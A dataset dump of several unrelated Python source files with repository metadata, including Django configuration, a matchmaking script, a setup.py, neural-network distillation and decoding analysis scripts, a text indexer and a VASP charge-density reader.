a625b979deaf6a06f61b88dd43ac56027f5f5322 | c59d6587ed5d7e7c4f4cbad2e4c8188eee741ad9 | /conftest.py | 134e36c3a4f3b5465cce6e8c54ef587ba3565484 | [] | no_license | n1k0din/kekino-api | 921d83b1be0c50e7dfb0b2411ba63fd9f3dc8039 | 4fef4b1c6bdec970fae1b599be4c719eee06e999 | refs/heads/master | 2023-08-27T18:21:16.640031 | 2021-11-07T11:13:01 | 2021-11-07T11:13:01 | 425,223,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 228 | py | import pytest
from django.conf import settings
@pytest.fixture(scope='session')
def django_db_setup():
settings.DATABASES['default'] = {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'db.sqlite3',
}
| [
"nik726@gmail.com"
] | nik726@gmail.com |
5cd615a49022a263364e32b093aa43810ec9af62 | dae3778cad4a7a1e1abdcc3d2d69083380bb8fc7 | /MatchMaking.py | fcc7f6b2fe851b82c23eb800413492b41282807f | [] | no_license | Artperkitny/RandomAlgos | 756bf49188587168b08ea86c91d0552413d370c0 | 90baca794d5e489f666d2a7c9b0acda20c65531a | refs/heads/master | 2020-04-16T13:22:13.351268 | 2015-05-15T03:44:59 | 2015-05-15T03:44:59 | 35,529,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,516 | py |
Girls = ["A", "B", "C"];
Girls_Answer = ["a", "a", "a"];
Boys = ["A", "B", "C"];
Boys_Answer = ["a", "b", "b"];
Result = "B";
def makeMatch(Girls,Girls_Answer,Boys,Boys_Answer,Result):
names = len(Girls);
answers = len(Girls_Answer[0]);
Girls_Combine = sorted(zip(Girls,Girls_Answer));
Boys_Combine = sorted(zip(Boys,Boys_Answer));
taken = [0]*names;
match_sum_array = [0]*names;
big_match_array = [0]*names;
#iterate over each name
for x in xrange(names):
#fetch the answers from first girl
answer_g = Girls_Combine[x][1];
found = "false";
for x2 in xrange(names):
#iterate first girl over each boy
answer_b = Boys_Combine[x2][1];
count = 0;
match_array = [0]*answers
for x3 in answer_b:
#iterate girls answer over boys answer
if(x3==answer_g[count]):
match_array[count] = 1;
count+=1;
big_match_array[x2] = sum(match_array);
found=1;
while(found):
match_sum_array[x] = big_match_array.index(max(big_match_array));
print x,match_sum_array;
if(x==0):
taken = match_sum_array[x];
found=0;
else:
for i in xrange(x):
if(match_sum_array[x]==match_sum_array[i]):
big_match_array[big_match_array.index(max(big_match_array))] = -1;
match_sum_array[x] = big_match_array.index(max(big_match_array));
else:
found=0;
for x in xrange(names):
if(Girls_Combine[x][0]==Result):
girl = x;
return Boys_Combine[match_sum_array[girl]][0];
print makeMatch(Girls,Girls_Answer,Boys,Boys_Answer,Result);
| [
"artperkitny@gmail.com"
] | artperkitny@gmail.com |
51764377a53f1a8e137c30d08f257ab755beb796 | 362ba01eb486897faf24bd54ee3b78473349eed2 | /ProjectKonjo/ProjectKonjo/bluetooth/urls.py | c8a94d3513513381f6fb8ad16a1a47a4bad92c81 | [
"Apache-2.0"
] | permissive | rubensollie/LockrPi | e7d908246004fc9a4442002ceb4553a6a591746e | 064e4df61b8084cee00b997380e1ccb1ac5cdf7b | refs/heads/master | 2021-04-26T13:22:28.981412 | 2016-09-26T19:55:26 | 2016-09-26T19:55:26 | 79,042,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 727 | py | from datetime import datetime
from django.conf.urls import url
import django.contrib.auth.views
import app.forms
import app.views
# Uncomment the next lines to enable the admin:
# from django.conf.urls import include
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = [
# Examples:
url(r'^add/$', app.views.add_bluetooth_device, name='add_bluetooth_device'),
url(r'^remove/$', app.views.remove_bluetooth_device, name='remove_bluetooth_device')
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# url(r'^admin/', include(admin.site.urls)),
] | [
"ruben@DESKTOP-M7F61LG"
] | ruben@DESKTOP-M7F61LG |
d564c8aa72b8618e3d89a78ea6866c695c94cd74 | 7462f315c3f011f50dc0d1ce89cf3d5f2eb024db | /tramp/likelihoods/abs_likelihood.py | 8ad31af49a0340c934ae371dcc2c870f70851570 | [
"MIT"
] | permissive | Artaxerces/tramp | 060bcceb50f59ad5de96ab4eba8aa322651d90cf | e5351e65676f2e9a1b90d0f4eaf11d8259b548ef | refs/heads/master | 2023-04-03T04:49:14.345162 | 2021-04-08T08:55:54 | 2021-04-08T08:55:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,252 | py | import numpy as np
from scipy.stats import norm
from .base_likelihood import Likelihood
from ..utils.integration import gaussian_measure_2d
class AbsLikelihood(Likelihood):
def __init__(self, y, y_name="y"):
self.y_name = y_name
self.size = self.get_size(y)
self.repr_init()
self.y = y
def sample(self, X):
return np.abs(X)
def math(self):
return r"$\mathrm{abs}$"
def compute_backward_posterior(self, az, bz, y):
rz = y * np.tanh(bz * y)
# 1 / cosh**2 leads to overflow
v = (y**2) * (1 - np.tanh(bz * y)**2)
vz = np.mean(v)
return rz, vz
def beliefs_measure(self, az, tau_z, f):
"NB: Assumes that f(bz, y) pair in y."
u_eff = np.maximum(0, az * tau_z - 1)
sz_eff = np.sqrt(az * u_eff)
def f_scaled(xi_b, xi_y):
bz = sz_eff * xi_b
y = bz / az + xi_y / np.sqrt(az)
return f(bz, y)
mu = gaussian_measure_2d(0, 1, 0, 1, f_scaled)
return mu
def measure(self, y, f):
return f(+y) + f(-y)
def compute_log_partition(self, az, bz, y):
logZ = np.sum(
-0.5*az*(y**2) + np.logaddexp(bz*y, -bz*y)
)
return logZ
| [
"antoine.baker59@gmail.com"
] | antoine.baker59@gmail.com |
f357eb496bccb34a809712c97c9517ac6f0fdd70 | 8ed3d2d285bb7255209b56a5ff9ec83bb4b8f430 | /setup.py | 6a083b3b06d7ee5d3ed16d73aacfe015edf07f6e | [] | no_license | MarkLuro/requests-html | f4af9211353e09908f254a9edc0965c084c59a36 | f43f3241f0c63cd50bb4286edffcc1f8ee5ae7bd | refs/heads/master | 2021-01-24T02:11:25.628019 | 2018-02-25T13:23:40 | 2018-02-25T13:23:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,023 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Note: To use the 'upload' functionality of this file, you must:
# $ pip install twine
import io
import os
import sys
from shutil import rmtree
from setuptools import find_packages, setup, Command
# Package meta-data.
NAME = 'requests-html'
DESCRIPTION = 'HTML Parsing for Humans.'
URL = 'https://github.com/requests/requests'
EMAIL = 'me@kennethreitz.org'
AUTHOR = 'Kenneth Reitz'
VERSION = '0.1.0'
# What packages are required for this module to be executed?
REQUIRED = [
'requests', 'pyquery', 'html2text', 'fake-useragent', 'parse'
]
# The rest you shouldn't have to touch too much :)
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier for that!
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.rst' is present in your MANIFEST.in file!
with io.open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = '\n' + f.read()
class UploadCommand(Command):
"""Support setup.py upload."""
description = 'Build and publish the package.'
user_options = []
@staticmethod
def status(s):
"""Prints things in bold."""
print('\033[1m{0}\033[0m'.format(s))
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPi via Twine…')
os.system('twine upload dist/*')
sys.exit()
# Where the magic happens:
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=long_description,
author=AUTHOR,
author_email=EMAIL,
url=URL,
# If your package is a single module, use this instead of 'packages':
py_modules=['requests_html'],
# entry_points={
# 'console_scripts': ['mycli=mymodule:cli'],
# },
install_requires=REQUIRED,
include_package_data=True,
license='MIT',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
# $ setup.py publish support.
cmdclass={
'upload': UploadCommand,
},
)
| [
"me@kennethreitz.org"
] | me@kennethreitz.org |
233da41e7bd6d8bc26423d834ec30979432da47b | 77f65ea86ebc544c3f3e66c0152086e45669068c | /ch09-objects/e42b2_recent_dict.py | 6449ace10c6bb5805d30a84d5cf9f40f10adaedd | [] | no_license | Cptgreenjeans/python-workout | e403f48b0694ff4db32fe5fc3f87f02f48a1a68e | b9c68520d572bf70eff8e554a8ee9c8702c88e6e | refs/heads/master | 2023-07-16T21:49:14.198660 | 2021-08-29T13:49:12 | 2021-08-29T13:49:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 374 | py | #!/usr/bin/env python3
"""Solution to chapter 9, exercise 42, beyond 2: recent_dict"""
class RecentDict(dict):
def __init__(self, maxsize):
super().__init__()
self.maxsize = maxsize
def __setitem__(self, key, value):
dict.__setitem__(self, str(key), value)
if len(self) > self.maxsize:
self.pop(list(self.keys())[0])
| [
"reuven@lerner.co.il"
] | reuven@lerner.co.il |
0768fa578bef2f20eb458538af07fba225c67d2c | c12fa5b48f93f64a842e36ba020c581c662e54e0 | /digitmedia/4 picmatch/mysift.py | f0510b270760dc9cd4605dc46b7824ba66bea982 | [
"MIT"
] | permissive | fffasttime/cs_misc | 13dc402ff390915b14d4d4812768fb1906084e0e | abff0dcaa840d07e2d948c50d9a9e53996c744fb | refs/heads/master | 2021-07-20T03:23:25.988431 | 2021-04-26T13:38:02 | 2021-04-26T13:38:02 | 247,418,480 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | import cv2
import numpy as np
import math
def detectAndCompute(img, _):
keypoint=cv2.goodFeaturesToTrack(img, 6, 0.01, 5).astype(int)
#print(keypoint)
img=img[:]
img=cv2.GaussianBlur(img, (5,5),1,1)
# TODO: Gauss pyramid
# grad filter
kernel = np.array([
[[-1,0,1],[-1,0,1],[-1,0,1]],
[[-1,-1,-1,],[0,0,0],[1,1,1]]
])
gx=cv2.filter2D(img, -1, kernel[1])
gy=cv2.filter2D(img, -1, kernel[0])
grad=(gx**2+gy**2)**0.5
angle=np.arctan2(gy, gx)
# TODO: rotate
desc=np.zeros([6,3,3,8],dtype=np.float32)
angle_dir8=((1-angle/math.pi)*4).astype(int)
for c, kp in enumerate(keypoint):
x=kp[0,0]-4
y=kp[0,1]-4
for i in range(9):
for j in range(9):
xx=x+i
yy=y+j
if xx>=0 and yy>=0 and xx<32 and yy <32:
desc[c,i//3,j//3,angle_dir8[xx,yy]]+=1
return keypoint, desc.reshape([6,72]) | [
"1148716581@qq.com"
] | 1148716581@qq.com |
0a522be1f7afc07653c832e157810722ee1beff8 | 39ac450698e68c44862fc8fdac9efc0ee9c6994d | /Week_01/id_2/LeetCode_24_2.py | 692557c9420c5f0ecf7bc81c0d792fb977e644c6 | [] | no_license | algorithm003/algorithm | 70d0f6a292c480e017e90ab5996772becbc7113c | 06b1a12411c22c3f24fd58b24f17a923dca380d5 | refs/heads/master | 2022-02-02T11:59:01.917835 | 2019-06-26T14:33:22 | 2019-08-05T15:55:03 | 189,704,070 | 18 | 65 | null | 2019-08-05T04:35:13 | 2019-06-01T07:31:23 | C++ | UTF-8 | Python | false | false | 633 | py | class ListNode:
def __init__(self, x):
self.val = x
self.next = None
"""
@author: Merlin 2019.06.23
24.Swap Nodes In Pairs
思路: 用两个指针不断交换元素,并移动指针到下一组要交换的元素即可
例子: 交换相邻两个节点,1->2->3->4->5,交换后得2->1->4->3->5
time: O(n) space: O(1)
"""
class Solution:
def swapPairs(self, head):
pre, pre.next = self, head
while pre.next and pre.next.next:
a = pre.next
b = a.next
pre.next, b.next, a.next = b, a, b.next
pre = a
return self.next | [
"377730858@qq.com"
] | 377730858@qq.com |
da6292de15c39ed810bb8e5fb5bc6779c09206fe | dbfe32395fddec182adcac5c628ee25f4228b424 | /DecodingPerformanceAcrossNumOfCells.py | b37ad96a81d0c0f4e86dde1160b262e1d60eef16 | [] | no_license | rweaton/CaTransDecodingCode | f8216e899b5b685022f893e515bf6fb8e64af481 | a11d9a2ec2e36e91292fe0ec68f1823618ead6cb | refs/heads/master | 2022-04-14T06:49:05.395439 | 2020-01-24T03:26:08 | 2020-01-24T03:26:08 | 178,295,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,581 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 2 07:46:53 2019
@author: thugwithyoyo
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import CalciumImagingFluorProcessing as CIFP
#import SlidingWindowAnalysisFunc as SWAF
import CalciumTraceDataframeFuncLib as CTDFL
from PeriEventTraceFuncLib import *
from collections import defaultdict
import shelve
import os
import tkinter as tk
from tkinter.filedialog import askopenfilename
#RestoreFilePath = SavePath +'.dat'
# Have user select workspace to load. Workspace must be a shelve object '.dat'
# file generated from SlidingWindowAnalysisFunc.py
root = tk.Tk()
RestoreFilePath = askopenfilename()
root.withdraw()
# Open workspace using Shelve loading script. Place in try/except block
# to try and bypass occasional loading errors.
#exec(open('./RestoreShelvedWorkspaceScript.py').read())
try:
exec(open('./RestoreShelvedWorkspaceScript.py').read())
except:
print('Unshelving error. Will attempt to continue...')
# Determine parent directory and filename from complete path.
drive, path_and_file = os.path.splitdrive(RestoreFilePath)
path, file = os.path.split(path_and_file)
# Define ParamsDict, the dictionary that contains the parameters for
# PLS decoding, Bootstrapping, Shuffle control processes.
# NOTE: ParamsDict is a variable contained in the loaded workspace. Uncomment
# any of the following ParamsDict assignments to make changes to parameter
# settings for this number-of-cells-dependent analysis.
## Begin settings re-assignment section ##
#ParamsDict = defaultdict(dict)
# Peripheral target entry events
#ParamsDict['RefEventsList'] = ['M6T0_Entry_ts', 'M7T1_Entry_ts']
#ParamsDict['RefEventsList'] = ['M6T0_Entry_ts', 'M6T1_Entry_ts']
# Scalar values assigned to event types listed above.
#ParamsDict['AssignedEventVals'] = [-1, 1]
# Set parameters for peri-event extraction
ParamsDict['BoundaryWindow'] = [-1., 1.]
#ParamsDict['StepWidth'] = 0.1
#ParamsDict['WindowWidth'] = 0.4
#ParamsDict['NumLatents'] = 5
#ParamsDict['NumRepetitions'] = 30
#ParamsDict['ConfLevel'] = 0.95
#ParamsDict['RelativeTolWindow'] = (0.0001, 2.5)
## End settings assignment section ##
# Define total number of traces to be processed per datapoint.
NumTotalTraces = 500
# Load calcium transient data into dataframe.
#CellFluorTraces_Frame = CIFP.FrameFromJSON(PathToFluorFile)
# Load behavioral events into data dictionary
#BehavDict = BehavDictGen(PathToBehavFile)
RefEventsDict = {'RefEventsList' : ParamsDict['RefEventsList'],
'AssignedEventVals' : ParamsDict['AssignedEventVals']}
# Generate an array of dicts with each dict element containing the number of
# draws to make per datapoint, as well as the number of traces to select per
# draw.
# First determine number of cells in cell fluorescence traces dataframe.
# Remember that the first column is a list of timestamps.
NumCells = CellFluorTraces_Frame.shape[1] - 1
# Generate a list array of the number of cell-traces to select per repetition
DrawCounts = np.arange(5, (NumCells + 1), 5)
DrawCounts = np.hstack([np.array([1, 2, 3, 4]), DrawCounts])
# Initialize an array of dictionaries to contain randomly drawn trace samples
(NumSamplingDicts,) = DrawCounts.shape
SamplingDicts = np.empty((NumSamplingDicts,), dtype=dict)
# Populate dictionaries of randomly-drawn traces. Note that the number of draws
# to perform depends on the number of cells selected. Here we use the relation:
# NumOfDraws = NumTotalTraces / NumTracesToDraw to determine the number of times
# to repeat a random draw of a size NumTracesToDraw.
for i in np.arange(0, NumSamplingDicts):
SamplingDicts[i] = {'NumTracesToDraw': DrawCounts[i],
'NumOfDraws' : int(np.round(NumTotalTraces / DrawCounts[i]))}
# Perform decoding on each of the randomly-drawn samples.
for i in np.arange(0, NumSamplingDicts):
# Initialze arrays to contain decoder performance output for each sample.
PerfDist = np.empty((SamplingDicts[i]['NumOfDraws'],))
ShuffledPerfDist = np.empty((SamplingDicts[i]['NumOfDraws'],))
# Repeat random sample draws NumOfDraw times. Each draw selects at random
# a total of NumTracesToDraw traces.
for DrawNum in np.arange(0, SamplingDicts[i]['NumOfDraws']):
# Call routine to randomly select traces from cell fluorescence
# dataframe. Output is also a Pandas dataframe.
SubsetFluorTraces_Frame = CTDFL.TraceSampler(CellFluorTraces_Frame,
SamplingDicts[i]['NumTracesToDraw'])
# Extract traces from the desired time domain on which decoding will
# be performed.
PeriEventExtractorDict = PeriEventExtractor_Trace(BehavDict,
SubsetFluorTraces_Frame, RefEventsDict,
ParamsDict['BoundaryWindow'])
# Generate a set of indices to test the inclusion portion of the
# performance code.
#InclusionSet = np.random.randint(0, high=NumTotalTrials, size=(NumTotalTrials,))
# Determine size of peri-event activity array
(NumTotalTrials, NumTotalFeatures) = PeriEventExtractorDict['PEA_Array'].shape
# Apply decoding routine to trace snippet. Store performance output
# in output array of dicts
PerfDist[DrawNum] = PLS_DecoderPerformance(PeriEventExtractorDict,
ParamsDict['NumLatents'])['performance']
# Shuffle outcome labels.
ShuffledIndices = np.arange(0, PeriEventExtractorDict['TargetsVec'].shape[0])
np.random.shuffle(ShuffledIndices)
PeriEventExtractorDict['TargetsVec'] = \
PeriEventExtractorDict['TargetsVec'][ShuffledIndices]
# Rerun the decoder using the list of shuffled outcomes and record
# performance in the shuffled output array of dicts.
ShuffledPerfDist[DrawNum] = PLS_DecoderPerformance(PeriEventExtractorDict,
ParamsDict['NumLatents'])['performance']
# Add outcomes arrays for this particular value of draw size to the
# corresponding array of dicts.
SamplingDicts[i].update({'PerfDist':PerfDist})
SamplingDicts[i].update({'ShuffledPerfDist':ShuffledPerfDist})
# Extract session id information for figure title.
FigureTitle = file[0:19]
# Initialize arrays to be plotted. These will contain averages and standard
# error values for both the observed and shuffled datasets.
PerfMeans = np.empty((NumSamplingDicts,))
PerfSEs = np.empty((NumSamplingDicts,))
ShuffledPerfMeans = np.empty((NumSamplingDicts,))
ShuffledPerfSEs = np.empty((NumSamplingDicts,))
# Initialize array to contain corresponding x-axis values for plotting
X = np.empty((NumSamplingDicts,))
# Initialize arrays to contain fill band boundaries for the two trace types
PerfFillBand = np.empty((2, NumSamplingDicts))
ShuffledPerfFillBand = np.empty((2, NumSamplingDicts))
# Iterate through SamplingDicts array and calculate element values of arrays
# to be used as plot input. Populate corresponding plot arrays that were
# initialized above.
for i in np.arange(0, NumSamplingDicts):
X[i] = SamplingDicts[i]['NumTracesToDraw']
PerfMeans[i] = np.mean(SamplingDicts[i]['PerfDist'])
PerfSEs[i] = (np.std(SamplingDicts[i]['PerfDist'], ddof=1) /
np.sqrt(SamplingDicts[i]['PerfDist'].shape[-1]))
ShuffledPerfMeans[i] = np.mean(SamplingDicts[i]['ShuffledPerfDist'])
ShuffledPerfSEs[i] = (np.std(SamplingDicts[i]['ShuffledPerfDist'], ddof=1) /
np.sqrt(SamplingDicts[i]['ShuffledPerfDist'].shape[-1]))
# Generate ceiling and floor boundaries of errorband for observed trace
PerfFillBand[0,:] = PerfMeans - PerfSEs
PerfFillBand[1,:] = PerfMeans + PerfSEs
# Generate ceiling and floor boundaries of errorband for shuffled trace
ShuffledPerfFillBand[0,:] = ShuffledPerfMeans - ShuffledPerfSEs
ShuffledPerfFillBand[1,:] = ShuffledPerfMeans + ShuffledPerfSEs
###### Save selected workspace variables ########
# Construct full path to write shelve file
SavePath = path + os.sep + file[0:19] + '_PerfVsNumCellsIncluded'
# Build list of variables to save.
VarsToSave = ['SamplingDicts', 'PerfMeans', 'ShuffledPerfMeans',
'PerfSEs', 'ShuffledPerfSEs', 'X', 'FigureTitle',
'PerfFillBand', 'ShuffledPerfFillBand', 'ParamsDict',
'NumTotalTraces', 'NumCells', 'RefEventsDict']
# Initialize and open self object
my_shelf = shelve.open(SavePath)
# Iterate through the list of keys in the save list, writing each to shelf
# object
for key in VarsToSave:
# Surround write command in try/except clause to bypass possible TypeError
# issues.
try:
#my_shelf[key] = globals()[key]
my_shelf[key] = locals()[key]
except TypeError:
#
# __builtins__, my_shelf, and imported modules can not be shelved.
#
print('ERROR shelving: {0}'.format(key))
# Close shelf object after variables have been written to file
my_shelf.close()
###### End workspace save ###########
#### Begin line plot generation #####
fig1, ax1 = plt.subplots()
fig1.suptitle(FigureTitle)
## Plot decoding of observed activity-outcome correspondence ##
# Set plot color of observed trace
PlotSpecDict = {'color':'orange'}
# Label observed trace for legend
TraceLabel = 'Observed outcomes'
#
ax1.fill_between(X, PerfFillBand[0,:], PerfFillBand[1,:],
label=TraceLabel, alpha=0.7, color=PlotSpecDict['color'])
#TraceLabel = 'Mean perf.'
ax1.plot(X, PerfMeans, '.-', color=PlotSpecDict['color'])
## Plot decoding performance on activity coupled with shuffled outcomes ##
# Set plot color of shuffled trace
PlotSpecDict = {'color':'gray'}
# Label shuffled trace for legend
TraceLabel = 'Shuffled outcomes'
# Plot errorband for shuffled trace
ax1.fill_between(X, ShuffledPerfFillBand[0,:], ShuffledPerfFillBand[1,:],
label=TraceLabel, alpha=0.7, color=PlotSpecDict['color'])
# Plot shuffled trace
ax1.plot(X, ShuffledPerfMeans, '.-', color=PlotSpecDict['color'])
# Set plot axes limits and generate labels.
ax1.set_xlabel('number of cells')
ax1.set_ylabel('performance')
ax1.set_ylim([0.4, 1])
ax1.legend(loc='lower right')
####### End line plot generation ###########
####### Save figure ###########
fig1.savefig(path + os.sep + file[0:19] + '_PerfVsNumCellsIncluded.svg') | [
"rweaton@ucdavis.edu"
] | rweaton@ucdavis.edu |
edbbe884c6f756ca71cf3d3e3a28124e1c5241fb | 502fa04d0dbb81c40cd3bc748c10f04b01589500 | /src/testing.py | fec7b1f255599ec23dc05eebfbba525533eefba3 | [] | no_license | surajKrish/evolvegcn-dndf-kd | d6060b2fdd655ebce0e531153129967344efa0e8 | 87701bed8c729c1cda7a72c08a8b4878898e5862 | refs/heads/master | 2023-02-28T17:36:19.488799 | 2021-01-30T12:14:34 | 2021-01-30T12:14:34 | 334,373,229 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,521 | py | import time
import torch
import torch.optim as optim
from utils import get_memory_and_execution_time_details
from train_test_split import train_test_split
from KnowledgeDistillation import KD
from src.NeuralNetworks.GCN import GCN
from src.NeuralNetworks.RecurrentGCN import RecurrentGCN
# Build the shared data loaders and the small GCN student network that both
# distillation experiments below evaluate against their teachers.
train_loader, test_loader, num_node_features = train_test_split()
student_model = GCN(num_node_features=num_node_features, hidden_channels=[100])
lr = 10e-5
weight_decay = 5e-4
student_optimizer = optim.Adam(student_model.parameters(), lr=lr, weight_decay=weight_decay, amsgrad=True)
# Distilled EvolveGCN
# Teacher #1: a pre-trained recurrent GCN (EvolveGCN), weights restored from disk.
epochs = 500
teacher_model_evolvegcn = RecurrentGCN(node_features=num_node_features, num_classes=2)
teacher_model_evolvegcn.load_state_dict(torch.load("./models/evolvegcn_teacher.pt"))
teacher_optimizer_evolvegcn = optim.Adam(teacher_model_evolvegcn.parameters(), lr=lr, weight_decay=weight_decay,
                                         amsgrad=True)
student_model.load_state_dict(torch.load("./models/evolvegcn_student.pt"))
distiller_evolvegcn = KD.VanillaKD(teacher_model_evolvegcn, student_model, train_loader, test_loader,
                                   teacher_optimizer_evolvegcn, student_optimizer)
# Profile memory use and execution time of evaluating teacher (True) vs student (False).
get_memory_and_execution_time_details(distiller_evolvegcn.evaluate, True)  # Evaluate the teacher network
get_memory_and_execution_time_details(distiller_evolvegcn.evaluate, False)  # Evaluate the student network
distiller_evolvegcn.get_parameters()
# Distilled Deep Neural Decision Forest
from src.DeepNeuralDecisionForest import NeuralDecisionForest as ndf
# Teacher #2: recurrent-GCN feature extractor feeding a neural decision forest.
epochs = 500
feat_layer = RecurrentGCN(node_features=num_node_features, num_classes=2, dropout_rate=0.65)
forest = ndf.Forest(n_tree=80, tree_depth=8, n_class=2, n_in_feature=2, tree_feature_rate=0.65)
teacher_model_dndf = ndf.NeuralDecisionForest(feat_layer, forest)
teacher_model_dndf.load_state_dict(torch.load("./models/dndf_teacher.pt"))
teacher_optimizer_dndf = optim.Adam(teacher_model_dndf.parameters(), lr=lr, weight_decay=weight_decay, amsgrad=True)
student_model.load_state_dict(torch.load("./models/dndf_student.pt"))
distiller_dndf = KD.VanillaKD(teacher_model_dndf, student_model, train_loader, test_loader,
                              teacher_optimizer_dndf, student_optimizer)
get_memory_and_execution_time_details(distiller_dndf.evaluate, True)  # Evaluate the teacher network
get_memory_and_execution_time_details(distiller_dndf.evaluate, False)  # Evaluate the student network
distiller_dndf.get_parameters()
| [
"surajKrish@users.noreply.github.com"
] | surajKrish@users.noreply.github.com |
7e94f2f379b7451b6f5601335bea880725993197 | 0c92ad9f050d8cfdcb8e405b0b13bce53ac8a304 | /line relevant/indexing_lr.py | 0966e035e70b9c2975a28594eebf7a9aabd3f081 | [] | no_license | Saurabh-Bazari/Search-Engine-Python | 36172a51d2dfcfba8fb89c1b9968301ec9ca3f7c | 57400946eb61d220285d2cccc0cc660b07d874db | refs/heads/master | 2021-04-09T17:13:06.256038 | 2019-01-08T14:21:03 | 2019-01-08T14:21:03 | 125,724,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,872 | py | import os,glob
import numpy as np
import pickle
from operator import itemgetter
import threading
def create_corpus_dict():
    """Read every files/*.txt and map '<name>,line.no:<n>' -> token list.

    Each line of each file becomes one corpus entry: the key joins the file
    name (with the 6-char 'files' + separator prefix sliced off) and the
    1-based line number; the value is the whitespace-split tokens.
    NOTE: the backtick repr syntax below is Python-2 only.
    """
    corpus=dict()
    for filename in glob.glob(os.path.join('files','*.txt')):
        # Drop the leading directory prefix, keeping just the file name.
        filename1=filename[6:]
        with open(filename) as infile:
            line_number=1
            for line in infile:
                key = filename1 + ",line.no:"+ `line_number`
                text=line.split()
                corpus[key]=text
                line_number=line_number+1
    return corpus
def create_indexing(word, key, index):
    """Record one occurrence of *word* at location *key* in the inverted
    index, creating the word's posting dict on first sight."""
    postings = index.setdefault(word, {})
    postings[key] = postings.get(key, 0) + 1
def calculate_average_value(table):
    """Return the arithmetic mean of the values of *table*.

    Fixes: the original iterated dict.itervalues(), which exists only under
    Python 2, and shadowed the builtin ``sum``.  dict.values() behaves the
    same on both Python 2 and 3 here.  An empty table still raises
    ZeroDivisionError, as before.
    """
    total = 0
    for length in table.values():
        total += length
    return float(total) / float(len(table))
def f2(corpus):
    """Thread target: persist the corpus dict to text/corpus.p."""
    # 'with' closes the handle deterministically; the original leaked it
    # (open() result was passed straight to pickle.dump and never closed).
    with open('text/corpus.p', "wb") as out:
        pickle.dump(corpus, out)
def f3(index):
    """Thread target: persist the inverted index to text/index.p."""
    with open('text/index.p', "wb") as out:
        pickle.dump(index, out)
def f4(table):
    """Thread target: persist the line-length table to text/table.p."""
    with open('text/table.p', "wb") as out:
        pickle.dump(table, out)
if __name__ == '__main__':
    # Build the {'<file>,line.no:<n>': [tokens]} corpus from files/*.txt.
    corpus = create_corpus_dict()
    index=dict()
    table=dict()
    # Stop words (plus empty/whitespace tokens) that are never indexed.
    ignore_list = [ 'is' , 'are' , 'the' , 'i' , 'my' ,'' ,' ','a' , 'an']
    for key in corpus:
        for word in corpus[key]:
            # Python-2 str.translate(None, deletechars): strip punctuation.
            word = word.translate(None,'.,%:;/') # remove all characters like .,%:etc
            word = word.strip()
            word = word.lower() # convert into lower case
            if word in ignore_list : # ignore words like is, are, the
                continue
            create_indexing(str(word), str(key),index)
        # Token count of this line, used later for length normalisation.
        length = len(corpus[str(key)])
        table[key] = length
    average_value = calculate_average_value(table)
    # NOTE(review): this open() handle is never closed explicitly.
    pickle.dump(average_value, open('text/average_value.p', "wb"))
    # Dump corpus, index and table concurrently, then wait for the writers.
    t1 = threading.Thread(target=f2, args=(corpus,))
    t1.start()
    t2 = threading.Thread(target=f3, args=(index,))
    t2.start()
    t3 = threading.Thread(target=f4, args=(table,))
    t3.start()
    t1.join()
    t2.join()
t3.join() | [
"saurabhbazari3101@gmail.com"
] | saurabhbazari3101@gmail.com |
04283c4f03a5d95a9bc868d1323896986783c79c | b3e7bc43b177ed9dc46fa5ba8fa11bc821ff845c | /pykit/chargedensity/vasp.py | 8c0766a6a5718a8baabba12d49ca14d304512175 | [] | no_license | gjenness/Pykit | 893ce12b91c36fbdde6868bfda08867def610be0 | fd29d8d74248d9993b5240d7eb1382c967224fa8 | refs/heads/master | 2021-01-10T21:04:52.537387 | 2013-01-11T22:57:47 | 2013-01-11T22:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,617 | py | import os, math, time, itertools
import numpy as np
from pykit.chargedensity.chargedensity import ChargeDensity
from pykit.geometry import geomread
class Chgcar(ChargeDensity):
    """VASP CHGCAR reader/writer built on the generic ChargeDensity base.

    Atom list and coordinates come from a companion POSCAR-style file parsed
    with geomread(); the charge-density grid itself is read from / written to
    the CHGCAR file.
    """
    def __init__(self, chgfile='CHGCAR', posfile='POSCAR', status='r'):
        # Base class handles the charge file bookkeeping; geometry (atoms and
        # fractional coordinates) is taken from the position file.
        ChargeDensity.__init__(self, chgfile=chgfile, status=status)
        pos = geomread(posfile)
        self.atomlist = pos.get_atom_list()
        self.coordinates = pos.get_positions()
    def read_chgfile(self):
        """Parse self.chgfile (CHGCAR format) into lattice, grid and chgden.

        NOTE(review): writes a scratch file named 'tmp' in the current
